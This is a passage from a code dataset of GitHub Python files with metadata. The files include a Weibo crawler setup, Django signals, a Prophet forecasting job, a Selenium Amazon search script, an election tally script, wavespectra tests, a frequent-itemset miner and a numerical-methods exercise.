urls.append(WeiboItem.url.format(uid=\"5675889356\", page=1))\n redis_init(WeiboItem.start_url, urls)\n\n\nif __name__ == '__main__':\n mode = sys.argv[1]\n mode_to_fun = {\n # 'user_detail': init_m_user_detail_redis_spider,\n # 'user_attention_tag': init_m_user_attention_tag_redis_spider,\n # 'user_attention_member': init_m_user_attention_member_redis_spider,\n # 'comment': init_m_comment_redis_spider,\n # 'repost': init_m_repost_redis_spider,\n 'weibo': init_m_weibo_redis_spider,\n # 'user_weibo': init_m_user_weibo_redis_spider,\n # 'attitude': init_m_attitude_redis_spider,\n }\n 
mode_to_fun[mode]()\n","repo_name":"rensuperk/weibo_crawler","sub_path":"weibo/redis_init.py","file_name":"redis_init.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73365730614","text":"from typing import TypedDict, Unpack\n\nfrom apps.anime.tasks import set_field_color\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom .models import AnimeModel\n\n\nclass DjangoInstance(TypedDict):\n instance: AnimeModel\n\n\n@receiver(post_save, sender=AnimeModel)\ndef banner_background_color_handler(\n **kwargs: Unpack[DjangoInstance],\n) -> None:\n instance = kwargs[\"instance\"]\n\n # Set Background Banner Image Color\n if (hasattr(instance, \"banner\")) and not instance.banner_background_color:\n set_field_color.delay(\n instance.pk,\n \"banner_background_color\",\n \"banner\",\n )\n\n # Set Background Cover Image Color\n if (hasattr(instance, \"cover\")) and not instance.cover_background_color:\n set_field_color.delay(\n instance.pk,\n \"cover_background_color\",\n \"cover\",\n )\n","repo_name":"baseplate-admin/CoreProject","sub_path":"backend/django_core/apps/anime/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"21"} +{"seq_id":"74146973492","text":"\"\"\"\nCommand line argument options parser.\nAdopted and modified from https://github.com/pytorch/examples/blob/master/imagenet/main.py\nUsage with two minuses \"- -\". Options are written with a minus \"-\" in command line, but\nappear with an underscore \"_\" in the attributes' list.\n\"\"\"\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='PyTorch Intrinsic Ordering Dataset Metrics Correlation')\n\n# Dataset and loading\nparser.add_argument('--dataset', default='CIFAR10', help='name of dataset')\nparser.add_argument('-j', '--workers', default=4, type=int, help='number of data loading workers (default: 4)')\nparser.add_argument('-p', '--patch-size', default=32, type=int, help='patch size for crops (default: 32)')\n\nparser.add_argument('--multilabel', default=False, action='store_true', help='if dataset has multiple'\n ' labels per image')\nparser.add_argument('--save-prob-vector', default=False, action='store_true', help='for single label:'\n 'save whole prob vector and not only max')\nparser.add_argument('--randomize-labels', default=False, action='store_true',\n help='randomize labels for every batch')\nparser.add_argument('-cp', '--corrupt-prob', default=0., type=float, help='label corruption/randomization probability/level (default: 0.)')\n\n# Architecture and weight-init\nparser.add_argument('-a', '--architecture', default='Net', help='model architecture')\nparser.add_argument('--weight-init', default='kaiming-normal',\n help='weight-initialization scheme (default: kaiming-normal)')\n\n# Training hyper-parameters\nparser.add_argument('--device-id', default=0, type=int, help='gpu device id on which to train')\nparser.add_argument('--num-networks', default=5, type=int, help='number of networks to train')\nparser.add_argument('--epochs', default=120, type=int, help='number of total epochs to run')\nparser.add_argument('-b', '--batch-size', default=128, type=int, help='mini-batch size (default: 128)')\nparser.add_argument('-lr', '--learning-rate', default=1e-3, type=float, help='initial learning rate (default: 1e-3)')\nparser.add_argument('--sgd-momentum', 
default=0.9, type=float, help='SGD momentum (default: 0.9)')\nparser.add_argument('-bn', '--batch-norm', default=1e-5, type=float, help='batch normalization (default 1e-5)')\nparser.add_argument('-wd', '--weight-decay', default=1e-5, type=float, help='weight decay (default 1e-5)')\n\nparser.add_argument('--optimizer-type', default='SGD', help='Adam or SGD')\nparser.add_argument('--scheduler-type', default='', help='scheduler type: CosineAnnealingLR or OneCycleLR')\nparser.add_argument('--eta-min', default=5e-4, type=float, help='min learning rate (default: 5e-4)')\nparser.add_argument('--step-gamma', default=0.2, type=float, help='StepLR: factor to reduce lr every step-size steps (default: 0.2)')\nparser.add_argument('--step-size', default=10, type=float, help='StepLR: step-size (default: 10)')\n\n# Resuming training\nparser.add_argument('--resume', default=False, action='store_true',\n help='if resume training')\n\n# Computation steps\nparser.add_argument('--save-dir', default='', help='directory with results to save/saved results')\nparser.add_argument('--compute-dataset-metrics', default=False, action='store_true', help='compute dataset metrics, like entropy')\nparser.add_argument('--train-networks', default=False, action='store_true', help='train several networks')\nparser.add_argument('--visualize-results', default=False, action='store_true', help='visualize agreement '\n 'and correlation with'\n 'dataset metrics')\nparser.add_argument('--agreement-type', default='single_label',\n help='defines which kind of multilabel agreement/accuracy to use')","repo_name":"ccc-frankfurt/intrinsic_ordering_nn_training","sub_path":"cmdparser.py","file_name":"cmdparser.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"2999600651","text":"#open file \n# r - read mode\n# w - write mode\n# a - append mode (append to the end of the file)\n# r+ - read and write\n\n# create a new file (if file does not exist) in append mode\nmy_opened_file = open(\"myfile.txt\", \"a\")\n# add a new line in the file\nmy_opened_file.write(\"\\ntest me\") \nmy_opened_file.close()\n\n\n# create a new file (if file does not exist) in write mode\nmy_new_file = open(\"my_new_file\", \"w\")\n# add contents to new file, if file exists it will overwrite its contents\nmy_new_file.write(\"my new content\")\nmy_new_file.close()","repo_name":"shadibdair/Python","sub_path":"Day 12 - 09.01.2019/01-writing-files.py","file_name":"01-writing-files.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7225520717","text":"from datetime import datetime\nimport typing\n\nimport pandas as pd\n\nimport prophet\n\nimport holidays\n\n\ndef run_forecast(\n dataset: pd.DataFrame, config: dict\n) -> typing.Tuple[pd.DataFrame, pd.DataFrame]:\n target = config[\"target\"]\n\n fit_parameters = config[\n \"forecast_parameters\"\n ].copy() # you must force a copy here or it assigns a reference to\n # the dictionary\n\n if config[\"holidays\"]:\n holiday_df = pd.DataFrame.from_dict(\n holidays.US(years=[2017, 2018, 2019, 2020, 2021]).items()\n ) # type: pd.DataFrame\n holiday_df.rename({0: \"ds\", 1: \"holiday\"}, inplace=True, axis=1)\n fit_parameters[\"holidays\"] = holiday_df\n fit_parameters[\"growth\"] = \"flat\"\n\n model = prophet.Prophet(**fit_parameters, mcmc_samples=0)\n\n if target == \"mobile\":\n step_change_date = 
datetime.strptime(\"2021-1-24\", \"%Y-%m-%d\").date()\n dataset[\"regressor_00\"] = dataset.apply(\n lambda x: 0 if x[\"ds\"] <= step_change_date else 1, axis=1\n ) # because of a step change in the data mobile data needs this\n\n model.add_regressor(name=\"regressor_00\")\n\n fit_model = model.fit(dataset)\n\n _ = fit_model.predict() # type: pd.DataFrame\n\n periods = remaining_days(dataset[\"ds\"].max(), config[\"stop_date\"])\n\n future = fit_model.make_future_dataframe(periods=periods) # type: pd.DataFrame\n\n if target == \"mobile\":\n future[\"regressor_00\"] = 1\n\n future_values = fit_model.predict(future)\n\n future_values = future_values[future_values[\"ds\"] > datetime.today()]\n\n uncertainty_samples_raw = fit_model.predictive_samples(future)\n\n uncertainty_samples = pd.DataFrame.from_records(uncertainty_samples_raw[\"yhat\"])\n\n uncertainty_samples[\"ds\"] = future[\"ds\"]\n\n return future_values, uncertainty_samples\n\n\ndef remaining_days(max_day, end_date) -> int:\n if type(max_day) == str:\n parts = [int(part) for part in max_day.split(\"-\")]\n max_day = datetime(year=parts[0], month=parts[1], day=parts[2]).date()\n\n if type(end_date) == str:\n parts = [int(part) for part in end_date.split(\"-\")]\n end_date = datetime(year=parts[0], month=parts[1], day=parts[2]).date()\n\n return (end_date - max_day).days\n","repo_name":"xluo-ds/docker-etl","sub_path":"jobs/kpi-forecasting/kpi-forecasting/Utils/FitForecast.py","file_name":"FitForecast.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"6204426301","text":"from selenium import webdriver\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\nbase_url=\"https://www.amazon.in\"\r\n\r\nsearch_term=input ('What do you want to search for in amazon ?')\r\n\r\ndriver=webdriver.Chrome(executable_path=r'C:/Users/dheem/Downloads/chromedriver_win32/chromedriver.exe')\r\n\r\ndriver.maximize_window()\r\n\r\ndriver.implicitly_wait(10) #10 is in seconds\r\n\r\ndriver.get(base_url)\r\n\r\nassert \"Amazon\" in driver.title\r\n\r\nsearchTextBox=driver.find_element_by_id(\"twotabsearchtextbox\")\r\n\r\nsearchTextBox.clear()\r\n\r\nsearchTextBox.send_keys(search_term)\r\n\r\nsearchTextBox.send_keys(Keys.RETURN)\r\n\r\nassert f\"Amazon.in:{search_term}\" in driver.title\r\n\r\nassert \"No results found.\" not in driver.page_source\r\n\r\ndriver.close()","repo_name":"dheemanthrk/yo","sub_path":"amazon1.py","file_name":"amazon1.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7650729013","text":"\n#load the modules\nimport csv\nimport os\n\n#total number of votes\n#number of candidates\n# Total votes for each candidate\n# percentage of votes each candiadate got\n# Winner of the election\n\n#Read the election_results.csv from the Resources folder in Asynch\n#Read file using direct method with WITH statement or indirectly with the open()\n#file_to_load = 'Resources/Election_results.csv'\n#using the os method to load a file from indirect path\nfile_to_load = os.path.join(\"Resources\",\"Election_results.csv\")\n#convert to txt file\nfile_to_save = os.path.join(\"analysis\",\"Election_analysis.txt\")\n\n#initialize the total vote count\ntotal_votes = 0\ncandidate_options = []\ncandidate_votes = {}\nwinning_count = 0\nwinning_percentage = 0\nwinning_candidate = 0\n\nwith open(file_to_load) as election_data:\n#election_data = 
open(file_to_load,'r')\n\n #print(election_data)\n#election_data.close()\n\n\n#with open(file_to_save, \"w\") as txtfile:\n#outfile.write(\"Hello\")\n#outfile.close()\n#txtfile.write\n\n#Read and analyze the data\n file_reader = csv.reader(election_data)\n#print header row\n headers=next(file_reader)\n print(headers)\n\n for row in file_reader:\n total_votes += 1\n candidate_name = row[2]\n if candidate_name not in candidate_options:\n\n candidate_options.append(candidate_name)\n candidate_votes[candidate_name] = 0\n candidate_votes[candidate_name] += 1\n\nwith open(file_to_save,\"w\") as txt_file:\n # Print the final vote count to the terminal.\n election_results = (\n f\"\\nElection Results\\n\"\n f\"-------------------------\\n\"\n f\"Total Votes: {total_votes:,}\\n\"\n f\"-------------------------\\n\")\n print(election_results, end=\"\")\n # Save the final vote count to the text file.\n txt_file.write(election_results)\n\n for candidate_name in candidate_votes:\n votes = candidate_votes[candidate_name]\n votes_percentage = float(votes)/float(total_votes) * 100\n #print(f\"{candidate_name}: received {round(votes_percentage,2)}% of the votes. \")\n #print(f\"{candidate_name}: {votes_percentage:.1f}%({votes:,})\\n\")\n\n if (votes > winning_count) and (votes_percentage > winning_percentage):\n winning_votes = votes\n winning_percentage = round(votes_percentage,2)\n winning_candidate = candidate_name \n\n winning_candidate_summary = (\n f\"----------------------\\n\"\n f\"winner: {winning_candidate}\\n\"\n f\"winning vote_count : {winning_votes:,}\\n\"\n f\"winning percentage : {winning_percentage:,}\\n\"\n f\"----------------------\\n\")\n\n print(winning_candidate_summary)\n\n\n\n #print(total_votes)\n #print(candidate_options)\n #print(candidate_votes)\n txt_file.write(winning_candidate_summary)\n\n\n\n\n","repo_name":"klkanchi/Election-Analysis","sub_path":"Pypoll.py","file_name":"Pypoll.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27555391909","text":"# -*- coding: utf-8 -*-\n\"\"\"Setup file for easyEEZYbotARM\n\"\"\"\n\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\n\nsetup(\n name=\"easyEEZYbotARM\",\n version=\"0.0.1\",\n description=\"A python controller (3 dimensions inverse and forward kinematics) for the EEZYbotARM (MK1,MK2,MK3) movement\",\n license=\"MIT\",\n long_description=long_description,\n author=\"Ben Money-Coomes\",\n author_email=\"ben.money@gmail.com\",\n url=\"https://github.com/meisben\",\n package_dir={'': 'python_packages'},\n packages=[\"easyEEZYbotARM\", ],\n install_requires=[\"scipy\", \"numpy\", \"matplotlib\", \"pySerial\"]\n)\n","repo_name":"meisben/easyEEZYbotARM","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"1626256031","text":"import sys\nimport gzip\n\nimport numpy as np\n\nrng = np.random.RandomState(0)\n\ndef say(s, stream=sys.stderr):\n stream.write(\"{}\".format(s))\n stream.flush()\n \ndef stop():\n sys.stdin.readline()\n \ndef assertion(cond):\n if not cond:\n raise Exception()\n \ndef load_embedding_iterator(filename, vocab=None, skip_head=True):\n line_idx = 0\n fopen = gzip.open if filename.endswith(\".gz\") else open\n with fopen(filename) as fin:\n for line in fin:\n line_idx += 1\n if skip_head and line_idx == 1:\n continue # 
skip head\n \n line = line.strip()\n if line:\n parts = line.split()\n word = parts[0]\n if vocab and word not in vocab: # skip useless vec\n continue\n \n vals = np.array([ float(x) for x in parts[1:] ])\n yield word, vals\n\ndef file_line_iterator(filename):\n with open(filename) as fin:\n for line in fin:\n yield line.strip()","repo_name":"yuanzh/aspect_adversarial","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"21"} +{"seq_id":"21862200671","text":"\"\"\"Testing the SpecArray accessor.\"\"\"\nimport os\nimport numpy as np\nimport xarray as xr\nimport pytest\n\nfrom wavespectra import SpecArray\n\n\nFILES_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"sample_files\")\n\n\n@pytest.fixture(scope=\"module\")\ndef dset():\n filename = os.path.join(FILES_DIR, \"wavespectra.nc\")\n _dset = xr.open_dataset(filename)\n yield _dset.efth\n\n\n@pytest.fixture(scope=\"module\")\ndef dset_full():\n filename = os.path.join(FILES_DIR, \"wavespectra.nc\")\n _dset = xr.open_dataset(filename)\n yield _dset\n\n\ndef test_accessor_attached(dset):\n assert hasattr(dset, \"spec\")\n\n\ndef test_repr(dset):\n assert \"SpecArray\" in repr(dset.spec)\n\n\ndef test_wavelen(dset):\n shallow = dset.spec.wavelen(depth=10)\n deep = dset.spec.wavelen(depth=100)\n assert all(deep - shallow) > 0\n\n\ndef test_partition_has_spectral_coords(dset):\n ds = dset.isel(freq=0, dir=0, drop=True)\n with pytest.raises(ValueError):\n ds.spec.partition(None, None, None)\n\n\ndef test_partition_efth_wind_depth_have_same_nonspectral_coords(dset_full):\n dset = dset_full\n wsp_darr = dset.wspd\n wdir_darr = dset.wdir\n dep_darr = dset.dpt.isel(time=0, drop=True)\n with pytest.raises(ValueError):\n dset.spec.partition(wsp_darr=wsp_darr, wdir_darr=wdir_darr, dep_darr=dep_darr)\n\n\ndef test_stats(dset):\n hs1 = dset.spec.hs()\n hs2 = dset.spec.stats([\"hs\"]).hs\n assert hs1.values == pytest.approx(hs2.values)\n\n dset.spec.stats([\"hs\", \"tp\", \"dpm\"], names=[\"hs1\", \"tp1\", \"dpm1\"])\n dset.spec.stats({\"hs\": {}, \"crsd\": {\"theta\": 90}})\n with pytest.raises(ValueError):\n dset.spec.stats(\"hs\")\n with pytest.raises(ValueError):\n dset.spec.stats([\"hs\", \"tp\", \"dpm\"], names=[\"hs1\", \"tp1\"])\n with pytest.raises(ValueError):\n dset.spec.stats([\"stat_not_implemented\"])\n with pytest.raises(ValueError):\n dset.spec.stats([\"dd\"])\n","repo_name":"wavespectra/wavespectra","sub_path":"tests/test_specarray.py","file_name":"test_specarray.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"21"} +{"seq_id":"6591958467","text":"import math\nimport itertools\nfrom pyspark import SparkContext\nimport sys\nimport numpy as np\nimport pandas as pd\nimport collections\nimport bisect\nimport json\nclass FirstList(collections.UserList):\n def __lt__(self, other):\n return self[0].__lt__(other)\ndef get_item_dict(baskets):\n\t# Assign each item (artist_id) an integer to be used as index in the matrix\n\titem_dict = {}\n\tfor basket in baskets:\n\t\titems = basket[1] #basket[0] is user_id, basket[1] is a list of artist_id\n\t\tfor item in items:\n\t\t\tif item not in item_dict:\n\t\t\t\t#len(item_dict) is the size of dictionary\n\t\t\t\t#When adding the first item, it evaluates to 0, adding the second item, it evaluates to 1\n\t\t\t\t#So the range of assigned integers is [0, #items-1]\n\t\t\t\titem_dict[item] = 
len(item_dict)\n\treturn item_dict\ndef get_item_counter(baskets):\n\titem_counter = collections.Counter()\n\tfor basket in baskets:\n\t\titems = basket[1]\n\t\titem_counter.update(items)\n\treturn item_counter\n\ndef inverse_dict(d):\n\t# {key: value} will become {value: key}\n\treturn {v: k for k, v in d.items()}\n\ndef tuple_wrapper(s):\n\tif type(s) is not tuple:\n\t\ts = (s, )\n\treturn s\n\ndef get_possible_k(item_dict, k):\n\tpossible_k = {}\n\tfor pair in itertools.combinations(item_dict.keys(), 2):\n\t\tpair_set = set()\n\t\tfor i in range(2):\n\t\t\tpair_set = pair_set.union(tuple_wrapper(pair[i]))\n\t\tif len(pair_set) == k:\n\t\t\tpossible_k[frozenset(pair_set)] = [pair[0], pair[1]]\n\treturn possible_k\ndef tuple_list_method(baskets, support, item_dict=None, k=2):\n if item_dict is None:\n item_dict = get_item_dict(baskets)\n else:\n # Only used in Q3, Q4, Q5\n # item_dict has been computed -> it's aprior method. Filter baskets to remove infrequent items\n # When k=2, infrequent single items have been removed from baskets. When k>=3, item_dict won't include single items\n # baskets will be modified!\n if k == 2:\n for i in range(len(baskets)):\n basket = baskets[i]\n items = basket[1]\n items_filterd = [item for item in items if item in item_dict]\n baskets[i] = (basket[0], items_filterd)\n\n item_dict_inv = inverse_dict(item_dict)\n n = len(item_dict)\n\n # Only used in Q3, Q4, Q5\n if k >= 3:\n possible_k = get_possible_k(item_dict, k)\n\n tuples = [] # Storage space is allocated every time a new pair is occurred, similar to LinkedList\n\n # Key logic: Tuple List Method\n for basket in baskets:\n items = basket[1]\n for kpair in itertools.combinations(items, k):\n # kpair is a k element tuple, kpair[i] is item (string)\n if k >= 3:\n pair_set = frozenset(kpair)\n\n # Now kpair is a 2 element pair\n kpair = possible_k.get(pair_set, None)\n if kpair is None:\n continue\n\n i = item_dict[kpair[0]]\n j = item_dict[kpair[1]]\n\n if i > j:\n j, i = i, j\n\n # Convert 2D index to 1D index\n # idx don't have to be continuous in this case. The only thing we care is their relative order.\n # We could use simple C style index calculation, or continue using the index method in q1\n # idx = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)\n idx = i*n+j\n\n # Core idea: tuples are sorted in increasing order, so they could be efficiently located by binary search\n # Example: x = [1, 4, 12, 20, 30, 50] If we want to find the index of item 30 and manipulate it, it could be found efficiently by binary search. bisect.bisect_left(x, 30)\n # Binary search takes O(log(n)) time, much faster than traversing the list, which takes O(n).\n # This is the benefit of keeping the list sorted. When adding items, we want to keep it sorted, finding the insertion index also takes O(log(n)) time. bisect.bisect_left(x, 25)\n # Checkout https://docs.python.org/3.6/library/bisect.html\n insert_idx = bisect.bisect_left(tuples, idx)\n\n # The insertion index is at the end of the list, i.e. the new item is larger than all items in the list\n if insert_idx >= len(tuples):\n tuples.append(FirstList([idx, 1]))\n else:\n tp = tuples[insert_idx]\n\n # This pair is already in the tuple list. Increase it's count (second element) by 1\n if tp[0] == idx:\n tp[1] += 1\n else:\n # This pair is not yet in the tuple list. 
Add a new tuple, the format is: (1D index, count)\n tuples.insert(insert_idx, FirstList([idx, 1]))\n\n # Extract results\n frequent_itemset_list = []\n for tp in tuples:\n count = tp[1]\n\n # Convert 1D index to 2D index\n # If you use different indexing method, this also needs to be changed\n i = tp[0] // n\n j = tp[0] % n\n\n item_i = item_dict_inv[i]\n item_j = item_dict_inv[j]\n\n # This implementation is ready for k>=3\n item_all = set()\n for item in (item_i, item_j):\n item_all = item_all.union(tuple_wrapper(item))\n\n item_all = tuple(sorted(list(item_all)))\n\n # apply support threshold\n if count >= support:\n frequent_itemset_list.append((item_all, count))\n\n frequent_itemset_list = sorted(frequent_itemset_list, key=lambda x: [-x[1]] + list(x[0]))\n return frequent_itemset_list\n# Wrap in a function to be reused in Q3\ndef triangular_matrix_method(baskets, support, item_dict=None, k=2):\n\tif item_dict is None:\n\t\titem_dict = get_item_dict(baskets) #item -> integer\n\telse:\n\t\t# Only used in Q4, Q5\n\t\t# item_dict has been computed -> it's aprior method. Filter baskets to remove infrequent items\n\t\t# When k=2, infrequent single items have been removed from baskets. When k>=3, item_dict won't include single items\n\t\t# baskets will be modified!\n\t\tif k == 2:\n\t\t\tfor i in range(len(baskets)):\n\t\t\t\tbasket = baskets[i]\n\t\t\t\titems = basket[1]\n\t\t\t\titems_filterd = [item for item in items if item in item_dict]\n\t\t\t\tbaskets[i] = (basket[0], items_filterd)\n\n\titem_dict_inv = inverse_dict(item_dict) #integer -> item. Inverse dict will be used when printing results\n\tn = len(item_dict)\n\n\t# Only used in Q4, Q5\n\tif k >= 3:\n\t\tpossible_k = get_possible_k(item_dict, k)\n\n\t# Storage space is pre-allocated. Similiar to ArrayList\n\t# Convert 2D index to 1D index\n\t# Conversion logic: https://stackoverflow.com/questions/27086195/linear-index-upper-triangular-matrix\n\ttri_matrix = [0] * (n * (n-1) // 2) # n * (n-1) always be even for n >= 2, use true division to make it a int\n\n\t# Key logic: Upper Triangular Matrix Method\n\tfor basket in baskets:\n\t\t# Take a basket (user), iterate all items (artist)\n\t\titems = basket[1]\n\n\t\t# Checkout https://docs.python.org/3.6/library/itertools.html#itertools.combinations\n\t\t# Equivalent to a double loop, but more concise\n\t\tfor kpair in itertools.combinations(items, k):\n\t\t\t# kpair is a k element tuple, kpair[i] is item (string)\n\t\t\tif k >= 3:\n\t\t\t\tpair_set = frozenset(kpair)\n\n\t\t\t\t# Now kpair is a 2 element pair\n\t\t\t\tkpair = possible_k.get(pair_set, None)\n\t\t\t\tif kpair is None:\n\t\t\t\t\tcontinue\n\n\t\t\t# i, j is integer index\n\t\t\ti = item_dict[kpair[0]]\n\t\t\tj = item_dict[kpair[1]]\n\n\t\t\t# Keep sorted in upper triangular order\n\t\t\tif i > j:\n\t\t\t\tj, i = i, j\n\n\t\t\t# Convert 2D index to 1D index\n\t\t\tidx = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)\n\t\t\t# Increase count by 1\n\t\t\ttri_matrix[idx] += 1\n\n\t# Extract results\n\tfrequent_itemset_list = []\n\tfor idx in range(len(tri_matrix)):\n\t\t# Convert 1D index to 2D index\n\t\ti = int(n - 2 - math.floor(math.sqrt(-8*idx + 4*n*(n-1)-7)/2.0 - 0.5))\n\t\tj = int(idx + i + 1 - n*(n-1)/2 + (n-i)*((n-i)-1)/2)\n\n\t\tcount = tri_matrix[idx]\n\t\titem_i = item_dict_inv[i]\n\t\titem_j = item_dict_inv[j]\n\n\t\t# Keep sorted in ascii order. 
item_i, item_j are strings or tuple of strings\n\t\t# This implementation is ready for k>=3\n\t\titem_all = set()\n\t\tfor item in (item_i, item_j):\n\t\t\titem_all = item_all.union(tuple_wrapper(item))\n\n\t\titem_all = tuple(sorted(list(item_all)))\n\n\t\t# apply support threshold\n\t\tif count >= support:\n\t\t\tfrequent_itemset_list.append((item_all, count))\n\n\t# First sorted by the occurrence count in decreasing order\n\t# Then sort by ascii order of the first item, in ascending order\n\t# Then sort by ascii order of the second item, in ascending order\n\tfrequent_itemset_list = sorted(frequent_itemset_list, key=lambda x: [-x[1]] + list(x[0]))\n\treturn frequent_itemset_list\n\ndef get_dict_from_frequent(frequent_list):\n\titem_dict = {}\n\tfor item in frequent_list:\n\t\titem_dict[item] = len(item_dict)\n\treturn item_dict\n\ndef aprior_all_method(baskets, support, method, son=False, total_baskets=0):\n\t# Used by Q5: SON\n\tif type(baskets) is not list:\n\t\tbaskets = list(baskets) #baskets are list now\n\tif son:\n\t\tsupport = math.floor(support*len(baskets)/total_baskets)\n\t\n\n\titem_counter = get_item_counter(baskets)\n\titemsets_1 = sorted([(k, v) for k, v in item_counter.items() if v >= support], key=lambda x: x[1], reverse=True)\n\tfrequent_1 = [x[0] for x in itemsets_1]\n\n\titemsets_list = [itemsets_1]\n\tfrequent_list = frequent_1\n\tfrequent_last = frequent_1\n\n\tk = 2\n\tmax_k = frequent_1[-1]\n\twhile True:\n\t\t# get a dictionary of current frequent items\n\t\t# Note: only frequent item pairs from the last pass is needed\n\t\titem_dict = get_dict_from_frequent(frequent_last)\n\n\t\t# baskets will be modfied!\n\t\titemsets = method(baskets, support, item_dict, k=k)\n\t\tif len(itemsets) > 0:\n\t\t\tfrequent_last = [x[0] for x in itemsets]\n\t\t\tfrequent_list += frequent_last\n\t\t\titemsets_list.append(itemsets)\n\t\t\tk += 1\n\t\telse:\n\t\t\tbreak \n\t\tif len(frequent_last)<=1:\n\t\t\tbreak\n\treturn itemsets_list, frequent_list\ndef get_dict_from_frequentitem(itemsets_list):\n\titemsets_dict = {}\n\tfor size in itemsets_list:\n\t\tfor item in size:\n\t\t\tif type(item[0]) is not tuple:\n\t\t\t\titemsets_dict[tuple_wrapper(item[0])] = item[1]\n\t\t\telse:\n\t\t\t\titemsets_dict[item[0]] = item[1]\n\t\n\treturn itemsets_dict\n\ndef print_all_frequent_itemsets(itemsets_list):\n\tn_itemsets = len(itemsets_list)\n\tfor i in range(n_itemsets-1, -1, -1):\n\t\tprint(f'Frequent itemsets of size: {i+1}')\n\t\tprint_frequent_itemsets(itemsets_list[i])\ndef print_frequent_itemsets(itemsets):\n\tfor frequent_itemset in itemsets:\n\t\tprint(frequent_itemset)\n\n\tprint(f'Total: {len(itemsets)}')\n\nif __name__ == '__main__':\n\tfilename = sys.argv[1]\n\toutput = sys.argv[2]\n\tinterest = float(sys.argv[3])\n\tsupport = int(sys.argv[4])\n\tratings = pd.read_csv(filename, encoding = 'utf8')\n\trating_filter = ratings[ratings['rating'] ==5]\n\tbasket_name = None\n\tbasket = []\n\tbaskets = []\n\tfor index,row in rating_filter.iterrows():\n\t\tuser_id, movie_id = int(row.userId), int(row.movieId)\n\t\tif user_id != basket_name:\n\t\t\tif basket_name is not None:\n\t\t\t\tbaskets.append((basket_name, basket))\n\t\t\tbasket = [movie_id]\n\t\t\tbasket_name = user_id\n\t\telse:\n\t\t\tbasket.append(movie_id)\n\tbaskets.append((basket_name, basket)) \n\t#print(baskets)\n\ttotal_baskets = len(baskets)\n\titemsets_list, frequent_list = aprior_all_method(baskets, support, tuple_list_method, True, total_baskets)\n\t#print(itemsets_list)\n\t#item_counter = 
get_item_counter(baskets)\n\t#itemsets_1 = sorted([(k, v) for k, v in item_counter.items() if v >= support], key=lambda x: x[1], reverse=True)\n\t#frequent_1 = [x[0] for x in itemsets_1]\n\t#frequent_list = frequent_1\n\titemsets_dict = get_dict_from_frequentitem(itemsets_list)\n\tanswers = []\n\t#print(frequent_list)\n\tfor pair in itertools.combinations(frequent_list,2):\n\t\tpair = list(pair)\n\t\tif type(pair[0]) is not tuple:\n\t\t\tpair[0] = tuple_wrapper(pair[0])\n\t\tif type(pair[1]) is not tuple:\n\t\t\tpair[1] = tuple_wrapper(pair[1])\n\t\tif abs(len(pair[0]) - len(pair[1]))== 1:\n\t\t\tif len(pair[0])>len(pair[1]):\n\t\t\t\ta = pair[0]\n\t\t\t\tb = pair[1]\n\t\t\telse:\n\t\t\t\ta = pair[1]\n\t\t\t\tb = pair[0]\n\t\t\tif set(b).issubset(set(a)):\n\t\t\t\tmovie_j = list(set(a) - set(b))[0]\n\t\t\t\tinterests = itemsets_dict[a]/itemsets_dict[b] - itemsets_dict[tuple_wrapper(movie_j)]/total_baskets\n\t\t\t\tif interests>= interest:\n\t\t\t\t\tassociate = sorted(list(set(b)))\n\t\t\t\t\tanswer = [associate, movie_j,interests ,itemsets_dict[a]]\n\t\t\t\t\tanswers.append(answer)\n\tanswers_sorted = sorted(answers, key=lambda x: (-abs(x[2]), -x[3], x[0], x[1]))\n\t#print(answers_sorted)\n\n\twith open(output,'w') as f:\n\t\tjson.dump(answers_sorted,f)\n\n\t\n","repo_name":"YiqunGan/Big-data-mining-with-Python-and-Spark","sub_path":"Big data mining with Python and Spark/yiqun_gan_hw2/yiqun_gan_task1.py","file_name":"yiqun_gan_task1.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17245652269","text":"# This program was written by Brendan Halliday\n# for Lab 4 Question 3 part c which asks to\n# answer exercise 6.13 parts a and b from\n# 'Computational Physics' by Mark Newman \n# This program defines a binary search function and\n# uses it to solve the non linear equation\n# derived from the blackbody equation\n\nimport numpy as np\nfrom numpy.core.numeric import count_nonzero\nfrom scipy import constants\nimport Lab04_Q3_a as q3a\nimport matplotlib.pyplot as plt\n\n# Define helper functions\ndef f(x):\n \"\"\"\n Define the nonlinear equation \n under question.\n \"\"\"\n\n return 5 * np.exp(-x) + x - 5\n\ndef f_0(x):\n \"\"\"\n This function is to be used for \n relaxation method for x = g(x) where\n x = x and g(x) = 5 - 5 * np.exp(-x)\n \"\"\"\n return 5 - 5 * np.exp(-x)\n\ndef f_prime(x):\n \"\"\"\n This function is the analytical derivative\n of 